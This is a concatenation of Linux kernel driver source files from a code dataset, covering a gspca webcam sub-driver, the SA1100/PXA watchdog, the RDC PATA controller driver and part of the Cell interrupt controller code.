PDEBUG(D_USBO, "SET %02x %04x %04x %02x", req, value, index, byte);
gspca_dev->usb_buf[0] = byte;
ret = usb_control_msg(dev, usb_sndctrlpipe(dev, 0),
req,
USB_DIR_OUT | USB_TYPE_VENDOR | USB_RECIP_DEVICE,
value, index,
gspca_dev->usb_buf, 1, 500);
if (ret < 0) {
err("reg_w err %d", ret);
gspca_dev->usb_err = ret;
}
}
static void wait_status_0(struct gspca_dev *gspca_dev)
{
int i;
i = 20;
do {
reg_r(gspca_dev, 0x21, 0x0000, 1);
if (gspca_dev->usb_buf[0] == 0)
return;
msleep(30);
} while (--i > 0);
PDEBUG(D_ERR, "wait_status_0 timeout");
gspca_dev->usb_err = -ETIME;
}
static void wait_status_1(struct gspca_dev *gspca_dev)
{
int i;
i = 10;
do {
reg_r(gspca_dev, 0x21, 0x0001, 1);
msleep(10);
if (gspca_dev->usb_buf[0] == 1) {
reg_wb(gspca_dev, 0x21, 0x0000, 0x0001, 0x00);
reg_r(gspca_dev, 0x21, 0x0001, 1);
return;
}
} while (--i > 0);
PDEBUG(D_ERR, "wait_status_1 timeout");
gspca_dev->usb_err = -ETIME;
}
static void setbrightness(struct gspca_dev *gspca_dev)
{
struct sd *sd = (struct sd *) gspca_dev;
reg_wb(gspca_dev, 0xc0, 0x0000, 0x00c0, sd->brightness);
}
static void setcontrast(struct gspca_dev *gspca_dev)
{
struct sd *sd = (struct sd *) gspca_dev;
reg_wb(gspca_dev, 0xc1, 0x0000, 0x00c1, sd->contrast);
}
static void sethue(struct gspca_dev *gspca_dev)
{
struct sd *sd = (struct sd *) gspca_dev;
reg_wb(gspca_dev, 0xc2, 0x0000, 0x0000, sd->hue);
}
static void setcolor(struct gspca_dev *gspca_dev)
{
struct sd *sd = (struct sd *) gspca_dev;
reg_wb(gspca_dev, 0xc3, 0x0000, 0x00c3, sd->color);
}
static void setsharpness(struct gspca_dev *gspca_dev)
{
struct sd *sd = (struct sd *) gspca_dev;
reg_wb(gspca_dev, 0xc4, 0x0000, 0x00c4, sd->sharpness);
}
/* this function is called at probe time */
static int sd_config(struct gspca_dev *gspca_dev,
const struct usb_device_id *id)
{
struct sd *sd = (struct sd *) gspca_dev;
gspca_dev->cam.cam_mode = vga_mode;
gspca_dev->cam.nmodes = ARRAY_SIZE(vga_mode);
gspca_dev->cam.npkt = 128; /* number of packets per ISOC message */
/*fixme: 256 in ms-win traces*/
sd->brightness = BRIGHTNESS_DEF;
sd->contrast = CONTRAST_DEF;
sd->hue = HUE_DEF;
sd->color = COLOR_DEF;
sd->sharpness = SHARPNESS_DEF;
gspca_dev->nbalt = 4; /* use alternate setting 3 */
return 0;
}
/* this function is called at probe and resume time */
static int sd_init(struct gspca_dev *gspca_dev)
{
reg_w(gspca_dev, 0x00, 0x0001, 0x2067);
reg_w(gspca_dev, 0x00, 0x00d0, 0x206b);
reg_w(gspca_dev, 0x00, 0x0000, 0x206c);
reg_w(gspca_dev, 0x00, 0x0001, 0x2069);
msleep(8);
reg_w(gspca_dev, 0x00, 0x00c0, 0x206b);
reg_w(gspca_dev, 0x00, 0x0000, 0x206c);
reg_w(gspca_dev, 0x00, 0x0001, 0x2069);
reg_r(gspca_dev, 0x20, 0x0000, 1);
reg_r(gspca_dev, 0x20, 0x0000, 5);
reg_r(gspca_dev, 0x23, 0x0000, 64);
PDEBUG(D_PROBE, "%s%s", &gspca_dev->usb_buf[0x1c],
&gspca_dev->usb_buf[0x30]);
reg_r(gspca_dev, 0x23, 0x0001, 64);
return gspca_dev->usb_err;
}
/* function called at start time before URB creation */
static int sd_isoc_init(struct gspca_dev *gspca_dev)
{
u8 mode;
reg_r(gspca_dev, 0x00, 0x2520, 1);
wait_status_0(gspca_dev);
reg_w(gspca_dev, 0xc5, 0x0003, 0x0000);
wait_status_1(gspca_dev);
wait_status_0(gspca_dev);
mode = gspca_dev->cam.cam_mode[gspca_dev->curr_mode].priv;
reg_wb(gspca_dev, 0x25, 0x0000, 0x0004, mode);
reg_r(gspca_dev, 0x25, 0x0004, 1);
reg_wb(gspca_dev, 0x27, 0x0000, 0x0000, 0x06);
reg_r(gspca_dev, 0x27, 0x0000, 1);
return gspca_dev->usb_err;
}
/* -- start the camera -- */
static int sd_start(struct gspca_dev *gspca_dev)
{
struct sd *sd = (struct sd *) gspca_dev;
/* initialize the JPEG header */
jpeg_define(sd->jpeg_hdr, gspca_dev->height, gspca_dev->width,
0x22); /* JPEG 411 */
/* the JPEG quality seems to be 82% */
jpeg_set_qual(sd->jpeg_hdr, 82);
/* set the controls */
setbrightness(gspca_dev);
setcontrast(gspca_dev);
sethue(gspca_dev);
setcolor(gspca_dev);
setsharpness(gspca_dev);
msleep(5);
reg_r(gspca_dev, 0x00, 0x2520, 1);
msleep(8);
/* start the capture */
wait_status_0(gspca_dev);
reg_w(gspca_dev, 0x31, 0x0000, 0x0004);
wait_status_1(gspca_dev);
wait_status_0(gspca_dev);
msleep(200);
sd->pkt_seq = 0;
return gspca_dev->usb_err;
}
static void sd_stopN(struct gspca_dev *gspca_dev)
{
/* stop the capture */
wait_status_0(gspca_dev);
reg_w(gspca_dev, 0x31, 0x0000, 0x0000);
wait_status_1(gspca_dev);
wait_status_0(gspca_dev);
}
/* move a packet adding 0x00 after 0xff */
static void add_packet(struct gspca_dev *gspca_dev,
u8 *data,
int len)
{
int i;
i = 0;
do {
if (data[i] == 0xff) {
gspca_frame_add(gspca_dev, INTER_PACKET,
data, i + 1);
len -= i;
data += i;
*data = 0x00;
i = 0;
}
} while (++i < len);
gspca_frame_add(gspca_dev, INTER_PACKET, data, len);
}
static void sd_pkt_scan(struct gspca_dev *gspca_dev,
u8 *data, /* isoc packet */
int len) /* iso packet length */
{
struct sd *sd = (struct sd *) gspca_dev;
static const u8 ffd9[] = {0xff, 0xd9};
/* image packets start with:
* 02 8n
* with <n> bit:
* 0x01: even (0) / odd (1) image
* 0x02: end of image when set
*/
if (len < 3)
return; /* empty packet */
if (*data == 0x02) {
if (data[1] & 0x02) {
sd->pkt_seq = !(data[1] & 1);
add_packet(gspca_dev, data + 2, len - 2);
gspca_frame_add(gspca_dev, LAST_PACKET,
ffd9, 2);
return;
}
if ((data[1] & 1) != sd->pkt_seq)
goto err;
if (gspca_dev->last_packet_type == LAST_PACKET)
gspca_frame_add(gspca_dev, FIRST_PACKET,
sd->jpeg_hdr, JPEG_HDR_SZ);
add_packet(gspca_dev, data + 2, len - 2);
return;
}
err:
gspca_dev->last_packet_type = DISCARD_PACKET;
}
static int sd_setbrightness(struct gspca_dev *gspca_dev, __s32 val)
{
struct sd *sd = (struct sd *) gspca_dev;
sd->brightness = val;
if (gspca_dev->streaming)
setbrightness(gspca_dev);
return gspca_dev->usb_err;
}
static int sd_getbrightness(struct gspca_dev *gspca_dev, __s32 *val)
{
struct sd *sd = (struct sd *) gspca_dev;
*val = sd->brightness;
return 0;
}
static int sd_setcontrast(struct gspca_dev *gspca_dev, __s32 val)
{
struct sd *sd = (struct sd *) gspca_dev;
sd->contrast = val;
if (gspca_dev->streaming)
setcontrast(gspca_dev);
return gspca_dev->usb_err;
}
static int sd_getcontrast(struct gspca_dev *gspca_dev, __s32 *val)
{
struct sd *sd = (struct sd *) gspca_dev;
*val = sd->contrast;
return 0;
}
static int sd_sethue(struct gspca_dev *gspca_dev, __s32 val)
{
struct sd *sd = (struct sd *) gspca_dev;
sd->hue = val;
if (gspca_dev->streaming)
sethue(gspca_dev);
return gspca_dev->usb_err;
}
static int sd_gethue(struct gspca_dev *gspca_dev, __s32 *val)
{
struct sd *sd = (struct sd *) gspca_dev;
*val = sd->hue;
return 0;
}
static int sd_setcolor(struct gspca_dev *gspca_dev, __s32 val)
{
struct sd *sd = (struct sd *) gspca_dev;
sd->color = val;
if (gspca_dev->streaming)
setcolor(gspca_dev);
return gspca_dev->usb_err;
}
static int sd_getcolor(struct gspca_dev *gspca_dev, __s32 *val)
{
struct sd *sd = (struct sd *) gspca_dev;
*val = sd->color;
return 0;
}
static int sd_setsharpness(struct gspca_dev *gspca_dev, __s32 val)
{
struct sd *sd = (struct sd *) gspca_dev;
sd->sharpness = val;
if (gspca_dev->streaming)
setsharpness(gspca_dev);
return gspca_dev->usb_err;
}
static int sd_getsharpness(struct gspca_dev *gspca_dev, __s32 *val)
{
struct sd *sd = (struct sd *) gspca_dev;
*val = sd->sharpness;
return 0;
}
/* sub-driver description */
static const struct sd_desc sd_desc = {
.name = MODULE_NAME,
.ctrls = sd_ctrls,
.nctrls = ARRAY_SIZE(sd_ctrls),
.config = sd_config,
.init = sd_init,
.isoc_init = sd_isoc_init,
.start = sd_start,
.stopN = sd_stopN,
.pkt_scan = sd_pkt_scan,
};
/* -- module initialisation -- */
static const struct usb_device_id device_table[] = {
{USB_DEVICE(0x04fc, 0x1528)},
{}
};
MODULE_DEVICE_TABLE(usb, device_table);
/* -- device connect -- */
static int sd_probe(struct usb_interface *intf,
const struct usb_device_id *id)
{
/* the video interface for isochronous transfer is 1 */
if (intf->cur_altsetting->desc.bInterfaceNumber != 1)
return -ENODEV;
return gspca_dev_probe2(intf, id, &sd_desc, sizeof(struct sd),
THIS_MODULE);
}
static struct usb_driver sd_driver = {
.name = MODULE_NAME,
.id_table = device_table,
.probe = sd_probe,
.disconnect = gspca_disconnect,
#ifdef CONFIG_PM
.suspend = gspca_suspend,
.resume = gspca_resume,
#endif
};
/* -- module insert / remove -- */
static int __init sd_mod_init(void)
{
return usb_register(&sd_driver);
}
static void __exit sd_mod_exit(void)
{
usb_deregister(&sd_driver);
}
module_init(sd_mod_init);
module_exit(sd_mod_exit);
| gpl-2.0 |
akshay-shah/android_kernel_samsung_crater | drivers/watchdog/sa1100_wdt.c | 4865 | 4569 | /*
* Watchdog driver for the SA11x0/PXA2xx
*
* (c) Copyright 2000 Oleg Drokin <green@crimea.edu>
* Based on SoftDog driver by Alan Cox <alan@lxorguk.ukuu.org.uk>
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version
* 2 of the License, or (at your option) any later version.
*
* Neither Oleg Drokin nor iXcelerator.com admit liability nor provide
* warranty for any of this software. This material is provided
* "AS-IS" and at no charge.
*
* (c) Copyright 2000 Oleg Drokin <green@crimea.edu>
*
* 27/11/2000 Initial release
*/
#include <linux/module.h>
#include <linux/moduleparam.h>
#include <linux/types.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/miscdevice.h>
#include <linux/watchdog.h>
#include <linux/init.h>
#include <linux/bitops.h>
#include <linux/uaccess.h>
#include <linux/timex.h>
#ifdef CONFIG_ARCH_PXA
#include <mach/regs-ost.h>
#endif
#include <mach/reset.h>
#include <mach/hardware.h>
static unsigned long oscr_freq;
static unsigned long sa1100wdt_users;
static unsigned int pre_margin;
static int boot_status;
/*
* Allow only one person to hold it open
*/
static int sa1100dog_open(struct inode *inode, struct file *file)
{
if (test_and_set_bit(1, &sa1100wdt_users))
return -EBUSY;
/* Activate SA1100 Watchdog timer */
OSMR3 = OSCR + pre_margin;
OSSR = OSSR_M3;
OWER = OWER_WME;
OIER |= OIER_E3;
return nonseekable_open(inode, file);
}
/*
* The watchdog cannot be disabled.
*
* Previous comments suggested that turning off the interrupt by
* clearing OIER[E3] would prevent the watchdog timing out but this
* does not appear to be true (at least on the PXA255).
*/
static int sa1100dog_release(struct inode *inode, struct file *file)
{
printk(KERN_CRIT "WATCHDOG: Device closed - timer will not stop\n");
clear_bit(1, &sa1100wdt_users);
return 0;
}
static ssize_t sa1100dog_write(struct file *file, const char __user *data,
size_t len, loff_t *ppos)
{
if (len)
/* Refresh OSMR3 timer. */
OSMR3 = OSCR + pre_margin;
return len;
}
static const struct watchdog_info ident = {
.options = WDIOF_CARDRESET | WDIOF_SETTIMEOUT
| WDIOF_KEEPALIVEPING,
.identity = "SA1100/PXA255 Watchdog",
.firmware_version = 1,
};
static long sa1100dog_ioctl(struct file *file, unsigned int cmd,
unsigned long arg)
{
int ret = -ENOTTY;
int time;
void __user *argp = (void __user *)arg;
int __user *p = argp;
switch (cmd) {
case WDIOC_GETSUPPORT:
ret = copy_to_user(argp, &ident,
sizeof(ident)) ? -EFAULT : 0;
break;
case WDIOC_GETSTATUS:
ret = put_user(0, p);
break;
case WDIOC_GETBOOTSTATUS:
ret = put_user(boot_status, p);
break;
case WDIOC_KEEPALIVE:
OSMR3 = OSCR + pre_margin;
ret = 0;
break;
case WDIOC_SETTIMEOUT:
ret = get_user(time, p);
if (ret)
break;
if (time <= 0 || (oscr_freq * (long long)time >= 0xffffffff)) {
ret = -EINVAL;
break;
}
pre_margin = oscr_freq * time;
OSMR3 = OSCR + pre_margin;
/*fall through*/
case WDIOC_GETTIMEOUT:
ret = put_user(pre_margin / oscr_freq, p);
break;
}
return ret;
}
static const struct file_operations sa1100dog_fops = {
.owner = THIS_MODULE,
.llseek = no_llseek,
.write = sa1100dog_write,
.unlocked_ioctl = sa1100dog_ioctl,
.open = sa1100dog_open,
.release = sa1100dog_release,
};
static struct miscdevice sa1100dog_miscdev = {
.minor = WATCHDOG_MINOR,
.name = "watchdog",
.fops = &sa1100dog_fops,
};
static int margin __initdata = 60; /* (secs) Default is 1 minute */
static int __init sa1100dog_init(void)
{
int ret;
oscr_freq = get_clock_tick_rate();
/*
* Read the reset status, and save it for later. If
* we suspend, RCSR will be cleared, and the watchdog
* reset reason will be lost.
*/
boot_status = (reset_status & RESET_STATUS_WATCHDOG) ?
WDIOF_CARDRESET : 0;
pre_margin = oscr_freq * margin;
ret = misc_register(&sa1100dog_miscdev);
if (ret == 0)
printk(KERN_INFO
"SA1100/PXA2xx Watchdog Timer: timer margin %d sec\n",
margin);
return ret;
}
static void __exit sa1100dog_exit(void)
{
misc_deregister(&sa1100dog_miscdev);
}
module_init(sa1100dog_init);
module_exit(sa1100dog_exit);
MODULE_AUTHOR("Oleg Drokin <green@crimea.edu>");
MODULE_DESCRIPTION("SA1100/PXA2xx Watchdog");
module_param(margin, int, 0);
MODULE_PARM_DESC(margin, "Watchdog margin in seconds (default 60s)");
MODULE_LICENSE("GPL");
MODULE_ALIAS_MISCDEV(WATCHDOG_MINOR);
| gpl-2.0 |
felipesanches/linux-sunxi | drivers/ata/pata_rdc.c | 5121 | 11221 | /*
* pata_rdc - Driver for later RDC PATA controllers
*
* This is actually a driver for hardware meeting
* INCITS 370-2004 (1510D): ATA Host Adapter Standards
*
* Based on ata_piix.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2, or (at your option)
* any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; see the file COPYING. If not, write to
* the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
*/
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/pci.h>
#include <linux/init.h>
#include <linux/blkdev.h>
#include <linux/delay.h>
#include <linux/device.h>
#include <linux/gfp.h>
#include <scsi/scsi_host.h>
#include <linux/libata.h>
#include <linux/dmi.h>
#define DRV_NAME "pata_rdc"
#define DRV_VERSION "0.01"
struct rdc_host_priv {
u32 saved_iocfg;
};
/**
* rdc_pata_cable_detect - Probe host controller cable detect info
* @ap: Port for which cable detect info is desired
*
* Read 80c cable indicator from ATA PCI device's PCI config
* register. This register is normally set by firmware (BIOS).
*
* LOCKING:
* None (inherited from caller).
*/
static int rdc_pata_cable_detect(struct ata_port *ap)
{
struct rdc_host_priv *hpriv = ap->host->private_data;
u8 mask;
/* check BIOS cable detect results */
mask = 0x30 << (2 * ap->port_no);
if ((hpriv->saved_iocfg & mask) == 0)
return ATA_CBL_PATA40;
return ATA_CBL_PATA80;
}
/**
* rdc_pata_prereset - prereset for PATA host controller
* @link: Target link
* @deadline: deadline jiffies for the operation
*
* LOCKING:
* None (inherited from caller).
*/
static int rdc_pata_prereset(struct ata_link *link, unsigned long deadline)
{
struct ata_port *ap = link->ap;
struct pci_dev *pdev = to_pci_dev(ap->host->dev);
static const struct pci_bits rdc_enable_bits[] = {
{ 0x41U, 1U, 0x80UL, 0x80UL }, /* port 0 */
{ 0x43U, 1U, 0x80UL, 0x80UL }, /* port 1 */
};
if (!pci_test_config_bits(pdev, &rdc_enable_bits[ap->port_no]))
return -ENOENT;
return ata_sff_prereset(link, deadline);
}
static DEFINE_SPINLOCK(rdc_lock);
/**
* rdc_set_piomode - Initialize host controller PATA PIO timings
* @ap: Port whose timings we are configuring
* @adev: um
*
* Set PIO mode for device, in host controller PCI config space.
*
* LOCKING:
* None (inherited from caller).
*/
static void rdc_set_piomode(struct ata_port *ap, struct ata_device *adev)
{
unsigned int pio = adev->pio_mode - XFER_PIO_0;
struct pci_dev *dev = to_pci_dev(ap->host->dev);
unsigned long flags;
unsigned int is_slave = (adev->devno != 0);
unsigned int master_port= ap->port_no ? 0x42 : 0x40;
unsigned int slave_port = 0x44;
u16 master_data;
u8 slave_data;
u8 udma_enable;
int control = 0;
static const /* ISP RTC */
u8 timings[][2] = { { 0, 0 },
{ 0, 0 },
{ 1, 0 },
{ 2, 1 },
{ 2, 3 }, };
if (pio >= 2)
control |= 1; /* TIME1 enable */
if (ata_pio_need_iordy(adev))
control |= 2; /* IE enable */
if (adev->class == ATA_DEV_ATA)
control |= 4; /* PPE enable */
spin_lock_irqsave(&rdc_lock, flags);
/* PIO configuration clears DTE unconditionally. It will be
* programmed in set_dmamode which is guaranteed to be called
* after set_piomode if any DMA mode is available.
*/
pci_read_config_word(dev, master_port, &master_data);
if (is_slave) {
/* clear TIME1|IE1|PPE1|DTE1 */
master_data &= 0xff0f;
/* Enable SITRE (separate slave timing register) */
master_data |= 0x4000;
/* enable PPE1, IE1 and TIME1 as needed */
master_data |= (control << 4);
pci_read_config_byte(dev, slave_port, &slave_data);
slave_data &= (ap->port_no ? 0x0f : 0xf0);
/* Load the timing nibble for this slave */
slave_data |= ((timings[pio][0] << 2) | timings[pio][1])
<< (ap->port_no ? 4 : 0);
} else {
/* clear ISP|RCT|TIME0|IE0|PPE0|DTE0 */
master_data &= 0xccf0;
/* Enable PPE, IE and TIME as appropriate */
master_data |= control;
/* load ISP and RCT */
master_data |=
(timings[pio][0] << 12) |
(timings[pio][1] << 8);
}
pci_write_config_word(dev, master_port, master_data);
if (is_slave)
pci_write_config_byte(dev, slave_port, slave_data);
/* Ensure the UDMA bit is off - it will be turned back on if
UDMA is selected */
pci_read_config_byte(dev, 0x48, &udma_enable);
udma_enable &= ~(1 << (2 * ap->port_no + adev->devno));
pci_write_config_byte(dev, 0x48, udma_enable);
spin_unlock_irqrestore(&rdc_lock, flags);
}
/**
* rdc_set_dmamode - Initialize host controller PATA PIO timings
* @ap: Port whose timings we are configuring
* @adev: Drive in question
*
* Set UDMA mode for device, in host controller PCI config space.
*
* LOCKING:
* None (inherited from caller).
*/
static void rdc_set_dmamode(struct ata_port *ap, struct ata_device *adev)
{
struct pci_dev *dev = to_pci_dev(ap->host->dev);
unsigned long flags;
u8 master_port = ap->port_no ? 0x42 : 0x40;
u16 master_data;
u8 speed = adev->dma_mode;
int devid = adev->devno + 2 * ap->port_no;
u8 udma_enable = 0;
static const /* ISP RTC */
u8 timings[][2] = { { 0, 0 },
{ 0, 0 },
{ 1, 0 },
{ 2, 1 },
{ 2, 3 }, };
spin_lock_irqsave(&rdc_lock, flags);
pci_read_config_word(dev, master_port, &master_data);
pci_read_config_byte(dev, 0x48, &udma_enable);
if (speed >= XFER_UDMA_0) {
unsigned int udma = adev->dma_mode - XFER_UDMA_0;
u16 udma_timing;
u16 ideconf;
int u_clock, u_speed;
/*
* UDMA is handled by a combination of clock switching and
* selection of dividers
*
* Handy rule: Odd modes are UDMATIMx 01, even are 02
* except UDMA0 which is 00
*/
u_speed = min(2 - (udma & 1), udma);
if (udma == 5)
u_clock = 0x1000; /* 100Mhz */
else if (udma > 2)
u_clock = 1; /* 66Mhz */
else
u_clock = 0; /* 33Mhz */
udma_enable |= (1 << devid);
/* Load the CT/RP selection */
pci_read_config_word(dev, 0x4A, &udma_timing);
udma_timing &= ~(3 << (4 * devid));
udma_timing |= u_speed << (4 * devid);
pci_write_config_word(dev, 0x4A, udma_timing);
/* Select a 33/66/100Mhz clock */
pci_read_config_word(dev, 0x54, &ideconf);
ideconf &= ~(0x1001 << devid);
ideconf |= u_clock << devid;
pci_write_config_word(dev, 0x54, ideconf);
} else {
/*
* MWDMA is driven by the PIO timings. We must also enable
* IORDY unconditionally along with TIME1. PPE has already
* been set when the PIO timing was set.
*/
unsigned int mwdma = adev->dma_mode - XFER_MW_DMA_0;
unsigned int control;
u8 slave_data;
const unsigned int needed_pio[3] = {
XFER_PIO_0, XFER_PIO_3, XFER_PIO_4
};
int pio = needed_pio[mwdma] - XFER_PIO_0;
control = 3; /* IORDY|TIME1 */
/* If the drive MWDMA is faster than it can do PIO then
we must force PIO into PIO0 */
if (adev->pio_mode < needed_pio[mwdma])
/* Enable DMA timing only */
control |= 8; /* PIO cycles in PIO0 */
if (adev->devno) { /* Slave */
master_data &= 0xFF4F; /* Mask out IORDY|TIME1|DMAONLY */
master_data |= control << 4;
pci_read_config_byte(dev, 0x44, &slave_data);
slave_data &= (ap->port_no ? 0x0f : 0xf0);
/* Load the matching timing */
slave_data |= ((timings[pio][0] << 2) | timings[pio][1]) << (ap->port_no ? 4 : 0);
pci_write_config_byte(dev, 0x44, slave_data);
} else { /* Master */
master_data &= 0xCCF4; /* Mask out IORDY|TIME1|DMAONLY
and master timing bits */
master_data |= control;
master_data |=
(timings[pio][0] << 12) |
(timings[pio][1] << 8);
}
udma_enable &= ~(1 << devid);
pci_write_config_word(dev, master_port, master_data);
}
pci_write_config_byte(dev, 0x48, udma_enable);
spin_unlock_irqrestore(&rdc_lock, flags);
}
static struct ata_port_operations rdc_pata_ops = {
.inherits = &ata_bmdma32_port_ops,
.cable_detect = rdc_pata_cable_detect,
.set_piomode = rdc_set_piomode,
.set_dmamode = rdc_set_dmamode,
.prereset = rdc_pata_prereset,
};
static struct ata_port_info rdc_port_info = {
.flags = ATA_FLAG_SLAVE_POSS,
.pio_mask = ATA_PIO4,
.mwdma_mask = ATA_MWDMA12_ONLY,
.udma_mask = ATA_UDMA5,
.port_ops = &rdc_pata_ops,
};
static struct scsi_host_template rdc_sht = {
ATA_BMDMA_SHT(DRV_NAME),
};
/**
* rdc_init_one - Register PIIX ATA PCI device with kernel services
* @pdev: PCI device to register
* @ent: Entry in rdc_pci_tbl matching with @pdev
*
* Called from kernel PCI layer. We probe for combined mode (sigh),
* and then hand over control to libata, for it to do the rest.
*
* LOCKING:
* Inherited from PCI layer (may sleep).
*
* RETURNS:
* Zero on success, or -ERRNO value.
*/
static int __devinit rdc_init_one(struct pci_dev *pdev,
const struct pci_device_id *ent)
{
struct device *dev = &pdev->dev;
struct ata_port_info port_info[2];
const struct ata_port_info *ppi[] = { &port_info[0], &port_info[1] };
unsigned long port_flags;
struct ata_host *host;
struct rdc_host_priv *hpriv;
int rc;
ata_print_version_once(&pdev->dev, DRV_VERSION);
port_info[0] = rdc_port_info;
port_info[1] = rdc_port_info;
port_flags = port_info[0].flags;
/* enable device and prepare host */
rc = pcim_enable_device(pdev);
if (rc)
return rc;
hpriv = devm_kzalloc(dev, sizeof(*hpriv), GFP_KERNEL);
if (!hpriv)
return -ENOMEM;
/* Save IOCFG, this will be used for cable detection, quirk
* detection and restoration on detach.
*/
pci_read_config_dword(pdev, 0x54, &hpriv->saved_iocfg);
rc = ata_pci_bmdma_prepare_host(pdev, ppi, &host);
if (rc)
return rc;
host->private_data = hpriv;
pci_intx(pdev, 1);
host->flags |= ATA_HOST_PARALLEL_SCAN;
pci_set_master(pdev);
return ata_pci_sff_activate_host(host, ata_bmdma_interrupt, &rdc_sht);
}
static void rdc_remove_one(struct pci_dev *pdev)
{
struct ata_host *host = dev_get_drvdata(&pdev->dev);
struct rdc_host_priv *hpriv = host->private_data;
pci_write_config_dword(pdev, 0x54, hpriv->saved_iocfg);
ata_pci_remove_one(pdev);
}
static const struct pci_device_id rdc_pci_tbl[] = {
{ PCI_DEVICE(0x17F3, 0x1011), },
{ PCI_DEVICE(0x17F3, 0x1012), },
{ } /* terminate list */
};
static struct pci_driver rdc_pci_driver = {
.name = DRV_NAME,
.id_table = rdc_pci_tbl,
.probe = rdc_init_one,
.remove = rdc_remove_one,
#ifdef CONFIG_PM
.suspend = ata_pci_device_suspend,
.resume = ata_pci_device_resume,
#endif
};
static int __init rdc_init(void)
{
return pci_register_driver(&rdc_pci_driver);
}
static void __exit rdc_exit(void)
{
pci_unregister_driver(&rdc_pci_driver);
}
module_init(rdc_init);
module_exit(rdc_exit);
MODULE_AUTHOR("Alan Cox (based on ata_piix)");
MODULE_DESCRIPTION("SCSI low-level driver for RDC PATA controllers");
MODULE_LICENSE("GPL");
MODULE_DEVICE_TABLE(pci, rdc_pci_tbl);
MODULE_VERSION(DRV_VERSION);
| gpl-2.0 |
bowser-boot/bowser-kernel | arch/powerpc/platforms/cell/interrupt.c | 7169 | 10746 | /*
* Cell Internal Interrupt Controller
*
* Copyright (C) 2006 Benjamin Herrenschmidt (benh@kernel.crashing.org)
* IBM, Corp.
*
* (C) Copyright IBM Deutschland Entwicklung GmbH 2005
*
* Author: Arnd Bergmann <arndb@de.ibm.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2, or (at your option)
* any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*
* TODO:
* - Fix various assumptions related to HW CPU numbers vs. linux CPU numbers
* vs node numbers in the setup code
* - Implement proper handling of maxcpus=1/2 (that is, routing of irqs from
* a non-active node to the active node)
*/
#include <linux/interrupt.h>
#include <linux/irq.h>
#include <linux/export.h>
#include <linux/percpu.h>
#include <linux/types.h>
#include <linux/ioport.h>
#include <linux/kernel_stat.h>
#include <asm/io.h>
#include <asm/pgtable.h>
#include <asm/prom.h>
#include <asm/ptrace.h>
#include <asm/machdep.h>
#include <asm/cell-regs.h>
#include "interrupt.h"
struct iic {
struct cbe_iic_thread_regs __iomem *regs;
u8 target_id;
u8 eoi_stack[16];
int eoi_ptr;
struct device_node *node;
};
static DEFINE_PER_CPU(struct iic, cpu_iic);
#define IIC_NODE_COUNT 2
static struct irq_domain *iic_host;
/* Convert between "pending" bits and hw irq number */
static irq_hw_number_t iic_pending_to_hwnum(struct cbe_iic_pending_bits bits)
{
unsigned char unit = bits.source & 0xf;
unsigned char node = bits.source >> 4;
unsigned char class = bits.class & 3;
/* Decode IPIs */
if (bits.flags & CBE_IIC_IRQ_IPI)
return IIC_IRQ_TYPE_IPI | (bits.prio >> 4);
else
return (node << IIC_IRQ_NODE_SHIFT) | (class << 4) | unit;
}
static void iic_mask(struct irq_data *d)
{
}
static void iic_unmask(struct irq_data *d)
{
}
static void iic_eoi(struct irq_data *d)
{
struct iic *iic = &__get_cpu_var(cpu_iic);
out_be64(&iic->regs->prio, iic->eoi_stack[--iic->eoi_ptr]);
BUG_ON(iic->eoi_ptr < 0);
}
static struct irq_chip iic_chip = {
.name = "CELL-IIC",
.irq_mask = iic_mask,
.irq_unmask = iic_unmask,
.irq_eoi = iic_eoi,
};
static void iic_ioexc_eoi(struct irq_data *d)
{
}
static void iic_ioexc_cascade(unsigned int irq, struct irq_desc *desc)
{
struct irq_chip *chip = irq_desc_get_chip(desc);
struct cbe_iic_regs __iomem *node_iic =
(void __iomem *)irq_desc_get_handler_data(desc);
unsigned int base = (irq & 0xffffff00) | IIC_IRQ_TYPE_IOEXC;
unsigned long bits, ack;
int cascade;
for (;;) {
bits = in_be64(&node_iic->iic_is);
if (bits == 0)
break;
/* pre-ack edge interrupts */
ack = bits & IIC_ISR_EDGE_MASK;
if (ack)
out_be64(&node_iic->iic_is, ack);
/* handle them */
for (cascade = 63; cascade >= 0; cascade--)
if (bits & (0x8000000000000000UL >> cascade)) {
unsigned int cirq =
irq_linear_revmap(iic_host,
base | cascade);
if (cirq != NO_IRQ)
generic_handle_irq(cirq);
}
/* post-ack level interrupts */
ack = bits & ~IIC_ISR_EDGE_MASK;
if (ack)
out_be64(&node_iic->iic_is, ack);
}
chip->irq_eoi(&desc->irq_data);
}
static struct irq_chip iic_ioexc_chip = {
.name = "CELL-IOEX",
.irq_mask = iic_mask,
.irq_unmask = iic_unmask,
.irq_eoi = iic_ioexc_eoi,
};
/* Get an IRQ number from the pending state register of the IIC */
static unsigned int iic_get_irq(void)
{
struct cbe_iic_pending_bits pending;
struct iic *iic;
unsigned int virq;
iic = &__get_cpu_var(cpu_iic);
*(unsigned long *) &pending =
in_be64((u64 __iomem *) &iic->regs->pending_destr);
if (!(pending.flags & CBE_IIC_IRQ_VALID))
return NO_IRQ;
virq = irq_linear_revmap(iic_host, iic_pending_to_hwnum(pending));
if (virq == NO_IRQ)
return NO_IRQ;
iic->eoi_stack[++iic->eoi_ptr] = pending.prio;
BUG_ON(iic->eoi_ptr > 15);
return virq;
}
void iic_setup_cpu(void)
{
out_be64(&__get_cpu_var(cpu_iic).regs->prio, 0xff);
}
u8 iic_get_target_id(int cpu)
{
return per_cpu(cpu_iic, cpu).target_id;
}
EXPORT_SYMBOL_GPL(iic_get_target_id);
#ifdef CONFIG_SMP
